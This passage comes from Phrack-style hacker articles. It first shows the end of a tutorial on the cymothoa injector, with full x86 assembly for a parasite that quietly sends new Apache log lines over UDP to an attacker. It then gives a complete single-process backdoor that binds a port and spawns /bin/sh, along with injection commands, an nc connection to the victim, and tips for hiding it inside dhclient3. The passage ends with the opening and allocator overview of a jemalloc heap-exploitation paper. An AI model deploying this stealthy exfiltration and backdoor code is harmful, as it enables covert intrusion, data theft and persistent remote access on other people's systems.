# prepare sys_socketcall (sendto) arguments
|
|
jmp struct_sockaddr
|
|
load_sockaddr:
|
|
pop %ecx
|
|
push $0x10 # sizeof(struct_sockaddr)
|
|
push %ecx # struct_sockaddr address
|
|
xorl %ecx, %ecx
|
|
push %ecx # flags
|
|
push %edx # buffer len
|
|
push %ebp # buffer pointer
|
|
push %eax # socket descriptor
|
|
|
|
# call to sys_sendto($11 (sendto), *args)
|
|
xorl %eax, %eax
|
|
mov $102, %al
|
|
xorl %ebx, %ebx
|
|
mov $11, %bl
|
|
mov %esp, %ecx
|
|
int $0x80
|
|
jmp restore_stack
|
|
|
|
struct_sockaddr:
|
|
call load_sockaddr
|
|
.short 0x02 # AF_INET
|
|
.short 0x5250 # PORT (replaced by the injector)
|
|
.long 0x34565049 # DEST IP (replaced by the injector)
|
|
|
|
restore_stack:
|
|
# restore stack
|
|
pop %ebx # socket descriptor
|
|
pop %eax # buffer pointer
|
|
pop %edx # buffer len
|
|
pop %eax # flags
|
|
pop %eax # struct_sockaddr address
|
|
pop %eax # sizeof(struct_sockaddr)
|
|
|
|
# deallocate buffer
|
|
add %edx, %esp
|
|
|
|
|
|
close_socket:
|
|
# call to sys_close(socket)
|
|
xorl %eax, %eax
|
|
mov $6, %al
|
|
int $0x80
|
|
|
|
return_to_main_proc:
|
|
|
|
# call to sys_close(fd)
|
|
xorl %eax, %eax
|
|
mov $6, %al
|
|
mov %edi, %ebx
|
|
int $0x80
|
|
|
|
# return
|
|
popa
|
|
ret
|
|
|
|
file_path:
|
|
call load_file_path
|
|
.ascii "/var/log/apache2/access.log"
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
The code is not written in a super-compact way, since the space it's not
|
|
a problem and the ease of programming and modification has been preferred.
|
|
|
|
The code can be summarized in a few steps:
|
|
1) Preable (we already know).
|
|
2) Check to see if it's the first execution. This step makes use of a
|
|
persistent memory location, provided by the injector.
|
|
3) File open and check of length.
|
|
4) Comparison with previous file's length.
|
|
4.1) If unchanged the parasite returns the execution to the host process.
|
|
4.2) If changed the execution continues.
|
|
5) Read the new lines of the file.
|
|
6) Send the new lines to the attacker via UDP
|
|
7) Restore the stack
|
|
8) Return the execution to the host process.
|
|
|
|
The shellcode receives several parameters from the injector: the address
|
|
of a persistent memory location, the attacker IP address and port, and the
|
|
microsecond interval for the timer.
|
|
|
|
The injector simply replaces known hexadecimal mark with these parameters
|
|
during the injection. You can see where the replacements occur looking
|
|
at the comments of the code.
|
|
|
|
Now on to the fun part: the practical use of the parasite.
|
|
|
|
The first thing to do is to prepare the server on the attacker's machine
|
|
to receive data. Inside the main directory of the injector is present a
|
|
simple implementation of UDP server.
|
|
|
|
You need only to specify an available port:
|
|
|
|
root@attacker# ./udp_server 5555
|
|
./udp_server: listening on port UDP 5555
|
|
|
|
Now we can move to the victim's machine, and choose suitable process.
|
|
For simplicity we will use cat again.
|
|
|
|
To inject the parasite we must specify some parameters:
|
|
|
|
root@victim# ./cymothoa -p `pidof cat` -s 14 -k 5000 -x attacker_ip -y 5555
|
|
[+] attaching to process 4694
|
|
|
|
register info:
|
|
-----------------------------------------------------------
|
|
eax value: 0xfffffe00 ebx value: 0x0
|
|
esp value: 0xbfa9f3f8 eip value: 0xb77e8430
|
|
------------------------------------------------------------
|
|
|
|
[+] new esp: 0xbfa9f3f4
|
|
[+] injecting code into 0xb77e9000
|
|
[+] copy general purpose registers
|
|
[+] persistent memory at 0xb7805000 (if used)
|
|
[+] detaching from 4694
|
|
|
|
[+] infected!!!
|
|
|
|
The process is now infected. No new process has been created.
|
|
|
|
Now, assuming an apache2 server is running, we can try to make some
|
|
requests to the server to update /var/log/apache2/access.log (the file
|
|
we are monitoring).
|
|
|
|
root@attacker# curl victim_ip
|
|
<html><body><h1>It works!</h1>
|
|
<p>This is the default web page for this server.</p>
|
|
<p>The web server software is running but no content has been added.</p>
|
|
</body></html>
|
|
|
|
If everything worked properly we should see, in the console of the UDP
|
|
server UDP, the new lines generated by our requests:
|
|
|
|
root@attacker# ./udp_server 5555
|
|
./udp_server: listening on port UDP 5555
|
|
::1 - - [26/May/2011:11:18:57 +0200] "GET / HTTP/1.1" 200 460 "-"
|
|
"curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k
|
|
zlib/1.2.3.3 libidn/1.15"
|
|
::1 - - [26/May/2011:11:19:26 +0200] "GET / HTTP/1.1" 200 460 "-"
|
|
"curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k
|
|
zlib/1.2.3.3 libidn/1.15"
|
|
...
|
|
|
|
Et voila, we have a remote file sniffer!
|
|
|
|
Of course the connections do not appear in the output of tools like
|
|
netstat, as they are only brief exchanges of data, and sockets are open
|
|
only when the monitored file has new lines (and immediately closed).
|
|
|
|
Some notes on the proper use of this preamble and parasite:
|
|
- This preamble is usually not compatible with virtually existing
|
|
shellcode. The code must be modified to return the execution to the
|
|
host process, restoring stack and registers.
|
|
- It is better to inject the parasite into servers that run all the time
|
|
the machine is on, but do not use processor very much. The server
|
|
dhclient3 is a perfect host.
|
|
|
|
------------[ 5.3 Single process backdoor
|
|
|
|
We have just arrived at the last and perhaps most interesting example of
|
|
parasite of this document.
|
|
That's what the author wanted to obtain: a backdoor that can live within
|
|
another process, without calls to fork() and without creating new threads.
|
|
|
|
The backdoor listens on a port (customizable by the injector), and
|
|
periodically checks if a client is connected. This part has been
|
|
implemented using nonblocking sockets and a modified alarm() preamble.
|
|
|
|
When a client is connected, it obtains a shell: the only time a call
|
|
to fork() is made.
|
|
|
|
As long as the backdoor is in listening mode, the only way to notice its
|
|
presence is to check the listening ports on the machine, but even in this
|
|
case we can use some tricks to make our parasite very difficult to detect.
|
|
|
|
Here's the code.
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
#
|
|
# Single process backdoor (alarm preamble)
|
|
#
|
|
|
|
handler:
|
|
pusha
|
|
|
|
set_signal_handler:
|
|
# signal(SIGALRM, handler)
|
|
xorl %eax, %eax
|
|
xorl %ebx, %ebx
|
|
mov $48, %al
|
|
mov $14, %bl
|
|
jmp set_signal_handler_end
|
|
load_handler:
|
|
pop %ecx
|
|
subl $0x18, %ecx # adjust %ecx to point handler()
|
|
int $0x80
|
|
jmp shellcode
|
|
|
|
set_signal_handler_end:
|
|
call load_handler
|
|
|
|
shellcode:
|
|
# check if already initialized
|
|
mov $0x4d454d50, %esi # replaced by the injector
|
|
# (persistent memory address)
|
|
mov (%esi), %eax
|
|
cmp $0xdeadbeef, %eax
|
|
je accept_call # jump if already initialized
|
|
|
|
socket_call:
|
|
# call to sys_socketcall($0x01 (socket), *args)
|
|
xorl %eax, %eax
|
|
mov $102, %al
|
|
xorl %ebx, %ebx
|
|
mov $0x01, %bl
|
|
jmp socket_args
|
|
load_socket_args:
|
|
pop %ecx
|
|
int $0x80 # %eax = socket descriptor
|
|
|
|
# save socket descriptor
|
|
mov $0xdeadbeef, %ebx
|
|
mov %ebx, (%esi)
|
|
add $4, %esi
|
|
mov %eax, (%esi)
|
|
sub $4, %esi
|
|
jmp fcntl_call
|
|
|
|
socket_args:
|
|
call load_socket_args
|
|
.long 0x02 # AF_INET
|
|
.long 0x01 # SOCK_STREAM
|
|
.long 0x00 # NULL
|
|
|
|
fcntl_call:
|
|
# call to sys_fcntl(socket, F_GETFL)
|
|
mov %eax, %ebx
|
|
xorl %eax, %eax
|
|
mov $55, %al
|
|
xorl %ecx, %ecx
|
|
mov $3, %cl
|
|
int $0x80
|
|
# call to sys_fcntl(socket, F_SETFL, flags | O_NONBLOCK)
|
|
mov %eax, %edx
|
|
xorl %eax, %eax
|
|
mov $55, %al
|
|
mov $4, %cl
|
|
orl $0x800, %edx # O_NONBLOCK (nonblocking socket)
|
|
int $0x80
|
|
|
|
bind_call:
|
|
# prepare sys_socketcall (bind) arguments
|
|
jmp struct_sockaddr
|
|
load_sockaddr:
|
|
pop %ecx
|
|
push $0x10 # sizeof(struct_sockaddr)
|
|
push %ecx # struct_sockaddr address
|
|
push %ebx # socket descriptor
|
|
|
|
# call to sys_socketcall($0x02 (bind), *args)
|
|
xorl %eax, %eax
|
|
mov $102, %al
|
|
xorl %ebx, %ebx
|
|
mov $0x02, %bl
|
|
mov %esp, %ecx
|
|
int $0x80
|
|
jmp listen_call
|
|
|
|
struct_sockaddr:
|
|
call load_sockaddr
|
|
.short 0x02 # AF_INET
|
|
.short 0x5250 # PORT (replaced by the injector)
|
|
.long 0x00 # INADDR_ANY
|
|
|
|
listen_call:
|
|
pop %eax # socket descriptor
|
|
pop %ebx
|
|
push $0x10 # queue (backlog)
|
|
push %eax # socket descriptor
|
|
|
|
# call to sys_socketcall($0x04 (listen), *args)
|
|
xorl %eax, %eax
|
|
mov $102, %al
|
|
xorl %ebx, %ebx
|
|
mov $0x04, %bl
|
|
mov %esp, %ecx
|
|
int $0x80
|
|
|
|
# restore stack
|
|
pop %edi
|
|
pop %edi
|
|
pop %edi
|
|
|
|
accept_call:
|
|
# prepare sys_socketcall (accept) arguments
|
|
xorl %ecx, %ecx
|
|
push %ecx # socklen_t *addrlen
|
|
push %ecx # struct sockaddr *addr
|
|
add $4, %esi
|
|
push (%esi) # socket descriptor
|
|
|
|
# call to sys_socketcall($0x05 (accept), *args)
|
|
xorl %eax, %eax
|
|
mov $102, %al
|
|
xorl %ebx, %ebx
|
|
mov $0x05, %bl
|
|
mov %esp, %ecx
|
|
int $0x80 # %eax = file descriptor or negative (on error)
|
|
mov %eax, %edx # save file descriptor
|
|
|
|
# restore stack
|
|
pop %edi
|
|
pop %edi
|
|
pop %edi
|
|
|
|
# check return value
|
|
test %eax, %eax
|
|
js schedule_next_and_return # jump on error (negative %eax)
|
|
|
|
|
|
fork_child:
|
|
# call to sys_fork()
|
|
xorl %eax, %eax
|
|
mov $2, %al
|
|
int $0x80
|
|
|
|
test %eax, %eax
|
|
jz dup2_multiple_calls # child continue execution
|
|
# parent schedule_next_and_return
|
|
|
|
schedule_next_and_return:
|
|
|
|
# call to sys_close(socket file descriptor)
|
|
# (since is used only by the child process)
|
|
xorl %eax, %eax
|
|
mov $6, %al
|
|
mov %edx, %ebx
|
|
int $0x80
|
|
|
|
# call to sys_waitpid(-1, NULL, WNOHANG)
|
|
# (to remove zombie processes)
|
|
xorl %eax, %eax
|
|
mov $7, %al
|
|
xorl %ebx, %ebx
|
|
dec %ebx
|
|
xorl %ecx, %ecx
|
|
xorl %edx, %edx
|
|
mov $1, %dl
|
|
int $0x80
|
|
|
|
# alarm(timeout)
|
|
xorl %eax, %eax
|
|
mov $27, %al
|
|
movl $0x53434553, %ebx # replaced by the injector (seconds)
|
|
int $0x80
|
|
|
|
# return
|
|
popa
|
|
ret
|
|
|
|
dup2_multiple_calls:
|
|
# dup2(socket, 2), dup2(socket, 1), dup2(socket, 0)
|
|
xorl %eax, %eax
|
|
xorl %ecx, %ecx
|
|
mov %edx, %ebx
|
|
mov $2, %cl
|
|
dup2_loop:
|
|
mov $63, %al
|
|
int $0x80
|
|
dec %ecx
|
|
jns dup2_loop
|
|
|
|
execve_call:
|
|
# call to sys_execve(program, *args)
|
|
xorl %eax, %eax
|
|
mov $11, %al
|
|
jmp program_path
|
|
load_program_path:
|
|
pop %ebx
|
|
# create argument list [program_path, NULL]
|
|
xorl %ecx, %ecx
|
|
push %ecx
|
|
push %ebx
|
|
mov %esp, %ecx
|
|
mov %esp, %edx
|
|
int $0x80
|
|
|
|
program_path:
|
|
call load_program_path
|
|
.ascii "/bin/sh"
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
A little summary of the code:
|
|
1) Half preable, only the signal() part.
|
|
2) Check to see if it's the first execution. This step makes use of a
|
|
persistent memory location, provided by the injector.
|
|
2.1) If already initialized jump to 7
|
|
2.2) If not initialized continue
|
|
3) Open socket.
|
|
4) Set nonblocking using fcntl().
|
|
5) Bind socket to the specified port.
|
|
6) Socket in listen mode with listen().
|
|
7) Check if a client is connected using accept().
|
|
7.1) No clients, jump to 9
|
|
7.2) Client connected, continue
|
|
8) Fork() a child process and execute a shell.
|
|
9) Set the timer and resume host execution
|
|
(the second half of the preamble)
|
|
|
|
For this shellcode the provided arguments are a persistent memory
|
|
address, the port to listen on and the timer (in seconds).
|
|
|
|
Finally, let's see a practical example of use.
|
|
|
|
First, we must identify our host process. We need also to find a door is
|
|
not likely to arouse suspicion.
|
|
|
|
root@victim# lsof -a -i -c dhclient3
|
|
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
|
|
dhclient3 1232 root 5u IPv4 4555 0t0 UDP *:bootpc
|
|
dhclient3 1612 root 4u IPv4 4554 0t0 UDP *:bootpc
|
|
|
|
Here we can see two dhclient3 processes with port 68/UDP open (bootpc): a
|
|
good strategy for our backdoor is to listen on port 68/TCP...
|
|
|
|
root@victim# ./cymothoa -p 1612 -s 13 -j 1 -y 68
|
|
[+] attaching to process 1612
|
|
|
|
register info:
|
|
-----------------------------------------------------------
|
|
eax value: 0xfffffdfe ebx value: 0x6
|
|
esp value: 0xbfff6dd0 eip value: 0xb7682430
|
|
------------------------------------------------------------
|
|
|
|
[+] new esp: 0xbfff6dcc
|
|
[+] injecting code into 0xb7683000
|
|
[+] copy general purpose registers
|
|
[+] persistent memory at 0xb769f000 (if used)
|
|
[+] detaching from 1612
|
|
|
|
[+] infected!!!
|
|
|
|
Let's see the result:
|
|
|
|
root@victim# lsof -a -i -c dhclient3
|
|
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
|
|
dhclient3 1232 root 5u IPv4 4555 0t0 UDP *:bootpc
|
|
dhclient3 1612 root 4u IPv4 4554 0t0 UDP *:bootpc
|
|
dhclient3 1612 root 7u IPv4 21892 0t0 TCP *:bootpc (LISTEN)
|
|
|
|
As you can see it is very difficult to see that something is wrong...
|
|
|
|
Now the attacker can connect to the victim and get a shell:
|
|
|
|
root@attacker# nc -vv victim_ip 68
|
|
Connection to victim_ip 68 port [tcp/bootpc] succeeded!
|
|
uname -a
|
|
Linux victim 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
|
|
|
|
We have achieved our goal: a single process backdoor :)
|
|
|
|
------[ 6. Something about the injector
|
|
|
|
In all these examples we always used the injector cymothoa [3].
|
|
Some notes about this tool...
|
|
|
|
The injector is very important because it allows the customization of the
|
|
shellcode and its injection in the right areas of memory.
|
|
|
|
Cymothoa wants to be an aid to developing shellcode, in several ways.
|
|
|
|
In the payloads directory there are all the assembly sources created by the
|
|
author, easily compilable with gcc:
|
|
|
|
root@box# cd payloads
|
|
root@box# ls
|
|
clone_shellcode.s fork_shellcode.s
|
|
scheduled_backdoor_alarm.s mmx_example_shellcode.s
|
|
scheduled_setitimer.s scheduled_alarm.s
|
|
scheduled_tail_setitimer.s
|
|
root@box# gcc -c scheduled_backdoor_alarm.s
|
|
root@box#
|
|
|
|
Cymothoa includes also some tools to easily extract the shellcode from
|
|
these object files.
|
|
|
|
For example bgrep [6], a binary grep, that allows to find the offset of
|
|
of particular hexadecimal sequences:
|
|
|
|
root@box# ./bgrep e8f0ffffff payloads/scheduled_backdoor_alarm.o
|
|
payloads/scheduled_backdoor_alarm.o: 0000014b
|
|
|
|
This is useful for finding the beginning of the code to extract.
|
|
|
|
Once you locate the beginning and the length of the code, you can easily
|
|
turn it into a C string with the script hexdump_to_cstring.pl.
|
|
|
|
root@box# hexdump -C -s 52 payloads/scheduled_backdoor_alarm.o -n 291 | \
|
|
./hexdump_to_cstring.pl
|
|
\x60\x31\xc0\x31\xdb\xb0\x30\xb3\x0e\xeb\x08\x59\x83\xe9\x18\xcd\x80\xeb
|
|
\x05\xe8\xf3\xff\xff\xff\xbe\x50\x4d\x45\x4d\x8b\x06\x3d\xef\xbe\xad\xde
|
|
\x0f\x84\x81\x00\x00\x00\x31\xc0\xb0\x66\x31\xdb\xb3\x01\xeb\x14\x59\xcd
|
|
...
|
|
|
|
Once this is done you can add this string to the file payloads.h, and
|
|
recompile cymothoa, to have a new, ready to inject, parasite.
|
|
|
|
If you want to transform into parasite code you already have available,
|
|
that's the easy way.
|
|
|
|
The last thing I want to mention about cymothoa, is a little utility
|
|
shipped with the main tool: a syscall code generator.
|
|
|
|
Writing syscall based shellcodes can be a tedious work, especially if
|
|
you must remember every syscall number and parameters.
|
|
|
|
Since I am a lazy person, I've written a script able to do part of
|
|
the hard work:
|
|
|
|
root@box# ./syscall_code.pl
|
|
Syscall shellcode generator
|
|
Usage:
|
|
./syscall_code.pl syscall
|
|
|
|
For example you can use it to generate the calling sequence for the
|
|
open syscall:
|
|
|
|
root@box# ./syscall_code.pl sys_open
|
|
sys_open_call:
|
|
# call to sys_open(filename, flags, mode)
|
|
xorl %eax, %eax
|
|
mov $5, %al
|
|
xorl %ebx, %ebx
|
|
mov filename, %bl
|
|
xorl %ecx, %ecx
|
|
mov flags, %cl
|
|
xorl %edx, %edx
|
|
mov mode, %dl
|
|
int $0x80
|
|
|
|
As you can see the script generates assembly code that marks arguments and
|
|
corresponding registers of the syscall, as well as the call number.
|
|
|
|
The code is not always 100% reliable (e.g. some syscalls require complex
|
|
structures the script is not able to construct), but it can greatly speed
|
|
up the shellcode development phase.
|
|
|
|
I hope you'll find it useful...
|
|
|
|
------[ 7. Further reading
|
|
|
|
While I was writing this article, on the defcon's website have been
|
|
published the talks which will take place during the next edition.
|
|
|
|
One of these caught my attention [7]:
|
|
|
|
Jugaad - Linux Thread Injection Kit
|
|
|
|
"... The kit currently works on Linux, allocates space inside
|
|
a process and injects and executes arbitrary payload as a
|
|
thread into that process. It utilizes the ptrace() functionality
|
|
to manipulate other processes on the system. ptrace() is an API
|
|
generally used by debuggers to manipulate(debug) a program.
|
|
By using the same functionality to inject and manipulate the
|
|
flow of execution of a program Jugaad is able to inject the
|
|
payload as a thread."
|
|
|
|
I recommend all readers who have judged this article interesting, to follow
|
|
this talk, because it is a similar research, but parallel to mine.
|
|
|
|
My goal was to implement a stealth backdoor without creating new processes
|
|
or threads, while the research of Aseem focuses on the creation of threads,
|
|
to achieve the same level of stealthiness.
|
|
|
|
I therefore offer my best wishes to Aseem, since I think our works are
|
|
complementary.
|
|
|
|
For additional material on "injection of code" you can see the links
|
|
listed at the end of the document.
|
|
|
|
Bye bye ppl ;)
|
|
|
|
Greetings (in random order): emgent, scox, white_sheep (and all ihteam),
|
|
sugar, renaud, bt_smarto, cris.
|
|
|
|
------[ 8. Links and references
|
|
|
|
[0] https://secure.wikimedia.org/wikipedia/en/wiki/Ptrace
|
|
[1] http://dl.packetstormsecurity.net/papers/unix/elf-runtime-fixup.txt
|
|
[2] http://www.phrack.org/issues.html?issue=58&id=4#article
|
|
(5 - The dynamic linker's dl-resolve() function)
|
|
[3] http://vxheavens.com/lib/vrn00.html#c42
|
|
[4] http://cymothoa.sourceforge.net/
|
|
[5] http://www.exploit-db.com/exploits/13388/
|
|
[6] http://debugmo.de/2009/04/bgrep-a-binary-grep/
|
|
[7] https://www.defcon.org/html/defcon-19/dc-19-speakers.html#Jakhar
|
|
|
|
------[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x0a of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------=[ Pseudomonarchia jemallocum ]=--------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=---------------=[ The false kingdom of jemalloc, or ]=------------------|
|
|
|=-----------=[ On exploiting the jemalloc memory manager ]=-------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ argp | huku ]=------------------------=|
|
|
|=--------------------=[ {argp,huku}@grhack.net ]=---------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
--[ Table of contents
|
|
|
|
1 - Introduction
|
|
1.1 - Thousand-faced jemalloc
|
|
2 - jemalloc memory allocator overview
|
|
2.1 - Basic structures
|
|
2.1.1 - Chunks (arena_chunk_t)
|
|
2.1.2 - Arenas (arena_t)
|
|
2.1.3 - Runs (arena_run_t)
|
|
2.1.4 - Regions/Allocations
|
|
2.1.5 - Bins (arena_bin_t)
|
|
2.1.6 - Huge allocations
|
|
2.1.7 - Thread caches (tcache_t)
|
|
2.1.8 - Unmask jemalloc
|
|
2.2 - Algorithms
|
|
3 - Exploitation tactics
|
|
3.1 - Adjacent region corruption
|
|
3.2 - Heap manipulation
|
|
3.3 - Metadata corruption
|
|
3.3.1 - Run (arena_run_t)
|
|
3.3.2 - Chunk (arena_chunk_t)
|
|
3.3.3 - Thread caches (tcache_t)
|
|
4 - A real vulnerability
|
|
5 - Future work
|
|
6 - Conclusion
|
|
7 - References
|
|
8 - Code
|
|
|
|
--[ 1 - Introduction
|
|
|
|
In this paper we investigate the security of the jemalloc allocator
|
|
in both theory and practice. We are particularly interested in the
|
|
exploitation of memory corruption bugs, so our security analysis will
|
|
be biased towards that end.
|
|
|
|
jemalloc is a userland memory allocator. It provides an implementation
|
|
for the standard malloc(3) interface for dynamic memory management. It
|
|
was written by Jason Evans (hence the 'je') for FreeBSD since there
|
|
was a need for a high performance, SMP-enabled memory allocator for
|
|
libc. After that, jemalloc was also used by the Mozilla Firefox browser
|
|
as its internal dedicated custom memory allocator.
|
|
|
|
All the above have led to a few versions of jemalloc that are very
|
|
similar but not exactly the same. To summarize, there are three different
|
|
widely used versions of jemalloc: 1) the standalone version [JESA],
|
|
2) the version in the Mozilla Firefox web browser [JEMF], and 3) the
|
|
FreeBSD libc [JEFB] version.
|
|
|
|
The exploitation vectors we investigate in this paper have been tested
|
|
on the jemalloc versions presented in subsection 1.1, all on the x86
|
|
platform. We assume basic knowledge of x86 and a general familiarity
|
|
with userland malloc() implementations, however these are not strictly
|
|
required.
|
|
|
|
|
|
----[ 1.1 - Thousand-faced jemalloc
|
|
|
|
There are so many different jemalloc versions that we almost went crazy
|
|
double checking everything in all possible platforms. Specifically, we
|
|
tested the latest standalone jemalloc version (2.2.3 at the time of this
|
|
writing), the version included in the latest FreeBSD libc (8.2-RELEASE),
|
|
and the Mozilla Firefox web browser version 11.0. Furthermore, we also
|
|
tested the Linux port of the FreeBSD malloc(3) implementation
|
|
(jemalloc_linux_20080828a in the accompanying code archive) [JELX].
|
|
|
|
|
|
--[ 2 - jemalloc memory allocator overview
|
|
|
|
The goal of this section is to provide a technical overview of the
|
|
jemalloc memory allocator. However, it is not all-inclusive. We will only
|
|
focus on the details that are useful for understanding the exploitation
|
|
attacks against jemalloc analyzed in the next section. The interested
|
|
reader can look in [JE06] for a more academic treatment of jemalloc
|
|
(including benchmarks, comparisons with other allocators, etc).
|
|
|
|
Before we start our analysis we would like to point out that jemalloc (as
|
|
well as other malloc implementations) does not implement concepts like
|
|
'unlinking' or 'frontlinking' which have proven to be catalytic for the
|
|
exploitation of dlmalloc and Microsoft Windows allocators. That said, we
|
|
would like to stress the fact that the attacks we are going to present do
|
|
not directly achieve a write-4-anywhere primitive. We, instead, focus on
|
|
how to force malloc() (and possibly realloc()) to return a chunk that will
|
|
most likely point to an already initialized memory region, in hope that
|
|
the region in question may hold objects important for the functionality
|
|
of the target application (C++ VPTRs, function pointers, buffer sizes and
|
|
so on). Considering the various anti-exploitation countermeasures present
|
|
in modern operating systems (ASLR, DEP and so on), we believe that such
|
|
an outcome is far more useful for an attacker than a 4 byte overwrite.
|
|
|
|
jemalloc, as a modern memory allocator should, recognizes that minimal
|
|
page utilization is no longer the most critical feature. Instead it
|
|
focuses on enhanced performance in retrieving data from the RAM. Based
|
|
on the principle of locality which states that items that are allocated
|
|
together are also used together, jemalloc tries to situate allocations
|
|
contiguously in memory. Another fundamental design choice of jemalloc is
|
|
its support for SMP systems and multi-threaded applications by trying
|
|
to avoid lock contention problems between many simultaneously running
|
|
threads. This is achieved by using many 'arenas' and the first time a
|
|
thread calls into the memory allocator (for example by calling malloc(3))
|
|
it is associated with a specific arena. The assignment of threads to
|
|
arenas happens with three possible algorithms: 1) with a simple hashing
|
|
on the thread's ID if TLS is available 2) with a simple builtin linear
|
|
congruential pseudo random number generator in case MALLOC_BALANCE is
|
|
defined and TLS is not available 3) or with the traditional round-robin
|
|
algorithm. For the later two cases, the association between a thread
|
|
and an arena doesn't stay the same for the whole life of the thread.
|
|
|
|
Continuing our high-level overview of the main jemalloc structures
|
|
before we dive into the details in subsection 2.1, we have the concept of
|
|
'chunks'. jemalloc divides memory into chunks, always of the same size,
|
|
and uses these chunks to store all of its other data structures (and
|
|
user-requested memory as well). Chunks are further divided into 'runs'
|
|
that are responsible for requests/allocations up to certain sizes. A run
|
|
keeps track of free and used 'regions' of these sizes. Regions are the
|
|
heap items returned on user allocations (e.g. malloc(3) calls). Finally,
|
|
each run is associated with a 'bin'. Bins are responsible for storing
|
|
structures (trees) of free regions.
|
|
|
|
The following diagram illustrates in an abstract manner the relationships
|
|
between the basic building blocks of jemalloc.
|
|
|
|
Chunk #0 Chunk #1
|
|
.--------------------------------. .--------------------------------.
|
|
| | | |
|
|
| Run #0 Run #1 | | Run #0 Run #1 |
|
|
| .-------------..-------------. | | .-------------..-------------. |
|
|
| | || | | | | || | |
|
|
| | Page || Page | | | | Page || Page | |
|
|
| | .---------. || .---------. | | | | .---------. || .---------. | |
|
|
| | | | || | | | | | | | | || | | | | ...
|
|
| | | Regions | || | Regions | | | | | | Regions | || | Regions | | |
|
|
| | |[] [] [] | || |[] [] [] | | | | | |[] [] [] | || |[] [] [] | | |
|
|
| | | ^ ^ | || | | | | | | | ^ ^ | || | | | |
|
|
| | `-|-----|-' || `---------' | | | | `-|-----|-' || `---------' | |
|
|
| `---|-----|---'`-------------' | | `---|-----|---'`-------------' |
|
|
`-----|-----|--------------------' `-----|-----|--------------------'
|
|
| | | |
|
|
| | | |
|
|
.---|-----|----------. .---|-----|----------.
|
|
| | | | | | | |
|
|
| free regions' tree | ... | free regions' tree | ...
|
|
| | | |
|
|
`--------------------' `--------------------'
|
|
bin[Chunk #0][Run #0] bin[Chunk #1][Run #0]
|
|
|
|
|
|
----[ 2.1 - Basic structures
|
|
|
|
In the following paragraphs we analyze in detail the basic jemalloc
|
|
structures. Familiarity with these structures is essential in order to
|
|
begin our understanding of the jemalloc internals and proceed to the
|
|
exploitation step.
|
|
|
|
|
|
------[ 2.1.1 - Chunks (arena_chunk_t)
|
|
|
|
If you are familiar with Linux heap exploitation (and more precisely with
|
|
dlmalloc internals) you have probably heard of the term 'chunk' before. In
|
|
dlmalloc, the term 'chunk' is used to denote the memory regions returned
|
|
by malloc(3) to the end user. We hope you get over it soon because when it
|
|
comes to jemalloc the term 'chunk' is used to describe big virtual memory
|
|
regions that the memory allocator conceptually divides available memory
|
|
into. The size of the chunk regions may vary depending on the jemalloc
|
|
variant used. For example, on FreeBSD 8.2-RELEASE, a chunk is a 1 MB region
|
|
(aligned to its size), while on the latest FreeBSD (in CVS at the time of
|
|
this writing) a jemalloc chunk is a region of size 2 MB. Chunks are the
|
|
highest abstraction used in jemalloc's design, that is the rest of the
|
|
structures described in the following paragraphs are actually placed within
|
|
a chunk somewhere in the target's memory.
|
|
|
|
The following are the chunk sizes in the jemalloc variants we have
|
|
examined:
|
|
|
|
+---------------------------------------+
|
|
| jemalloc variant | Chunk size |
|
|
+---------------------------------------+
|
|
| FreeBSD 8.2-RELEASE | 1 MB |
|
|
-----------------------------------------
|
|
| Standalone v2.2.3 | 4 MB |
|
|
-----------------------------------------
|
|
| jemalloc_linux_20080828a | 1 MB |
|
|
-----------------------------------------
|
|
| Mozilla Firefox v5.0 | 1 MB |
|
|
-----------------------------------------
|
|
| Mozilla Firefox v7.0.1 | 1 MB |
|
|
-----------------------------------------
|
|
| Mozilla Firefox v11.0 | 1 MB |
|
|
-----------------------------------------
|
|
|
|
An area of jemalloc managed memory divided into chunks looks like the
|
|
following diagram. We assume a chunk size of 4 MB; remember that chunks are
|
|
aligned to their size. The address 0xb7000000 does not have a particular
|
|
significance apart from illustrating the offsets between each chunk.
|
|
|
|
+-------------------------------------------------------------------------+
|
|
| Chunk alignment | Chunk content |
|
|
+-------------------------------------------------------------------------+
|
|
| Chunk #1 starts at: 0xb7000000 [ Arena ]
|
|
| Chunk #2 starts at: 0xb7400000 [ Arena ]
|
|
| Chunk #3 starts at: 0xb7800000 [ Arena ]
|
|
| Chunk #4 starts at: 0xb7c00000 [ Arena ]
|
|
| Chunk #5 starts at: 0xb8000000 [ Huge allocation region, see below ]
|
|
| Chunk #6 starts at: 0xb8400000 [ Arena ]
|
|
| Chunk #7 starts at: 0xb8800000 [ Huge allocation region ]
|
|
| Chunk #8 starts at: 0xb8c00000 [ Huge allocation region ]
|
|
| Chunk #9 starts at: 0xb9000000 [ Arena ]
|
|
+-------------------------------------------------------------------------+
|
|
|
|
Huge allocation regions are memory regions managed by jemalloc chunks that
|
|
satisfy huge malloc(3) requests. Apart from the huge size class, jemalloc
|
|
also has the small/medium and large size classes for end user allocations
|
|
(both managed by arenas). We analyze jemalloc's size classes of regions in
|
|
subsection 2.1.4.
|
|
|
|
Chunks are described by 'arena_chunk_t' structures (taken from the
|
|
standalone version of jemalloc; we have added and removed comments in
|
|
order to make things more clear):
|
|
|
|
|
|
[2-1]
|
|
|
|
typedef struct arena_chunk_s arena_chunk_t;
|
|
struct arena_chunk_s
|
|
{
|
|
/* The arena that owns this chunk. */
|
|
arena_t *arena;
|
|
|
|
